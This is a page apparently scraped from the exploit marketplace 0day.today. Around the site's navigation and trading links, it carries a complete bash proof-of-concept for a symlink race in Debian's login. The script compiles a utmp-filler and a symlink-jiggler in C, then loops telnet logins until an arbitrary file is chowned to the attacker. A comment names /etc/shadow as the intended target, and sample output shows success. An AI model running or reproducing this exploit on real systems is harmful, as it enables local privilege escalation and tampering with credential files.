0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC
======================================================================= Debian GNU/Linux (symlink attack in login) Arbitrary File Ownership PoC ======================================================================= #!/bin/bash - echo ' #include <string.h> #include <stdlib.h> #include <unistd.h> #include <utmp.h> #include <sys/types.h> #include <stdio.h> int main(int argc, char *argv[]) { struct utmp entry; int i; entry.ut_type=LOGIN_PROCESS; strcpy(entry.ut_line,"/tmp/x"); entry.ut_time=0; strcpy(entry.ut_user,"badguy"); strcpy(entry.ut_host,"badhost"); entry.ut_addr=0; for(i=1;i<9;i++) { entry.ut_pid=(pid_t)( i + (int)getpid() ); sprintf(entry.ut_id,"bad%d",i); pututline(&entry); } } ' > /tmp/fillutmp.c cc -o /tmp/fillutmp /tmp/fillutmp.c echo 'Ask someone with group utmp privileges to do:' echo ' chgrp utmp /tmp/fillutmp; chmod 2755 /tmp/fillutmp' echo -n 'Press [RETURN] to continue... ' read ANS echo ' #include <unistd.h> int main(int argc, char *argv[]) { while(1) { unlink("/tmp/x"); symlink(argv[1],"/tmp/x"); unlink("/tmp/x"); symlink(argv[2],"/tmp/x"); } } ' > /tmp/jigglelnk.c cc -o /tmp/jigglelnk /tmp/jigglelnk.c HOST=`hostname` # or simply localhost? echo "Which tty do you think a 'telnet $HOST' will use next?" echo "(Do that telnet and see...)" read TTY echo "You said it will be '$TTY' ..." ATK=/etc/debian_version # should be /etc/shadow echo "Starting symlink re-jiggler ..." /tmp/jigglelnk $TTY $ATK & JIG=$! LOOP=0 while :; do ((LOOP = $LOOP + 1)) echo; echo; echo "Try = $LOOP" /tmp/fillutmp echo "Telnetting... if login succeeds, just exit for next try..." /usr/bin/telnet $HOST LS=`ls -ld $ATK` case "$LS" in *root*root* ) ;; # not done yet... * ) echo; echo echo "Success after $LOOP tries!" echo "$LS" echo; echo break ;; esac done kill $JIG rm /tmp/fillutmp /tmp/jigglelnk /tmp/x # ... # ~$ logout # Connection closed by foreign host. # Success after 12 tries! # -rw------- 1 psz tty 4 Oct 28 2006 /etc/debian_version # 0day.today [2024-07-05] #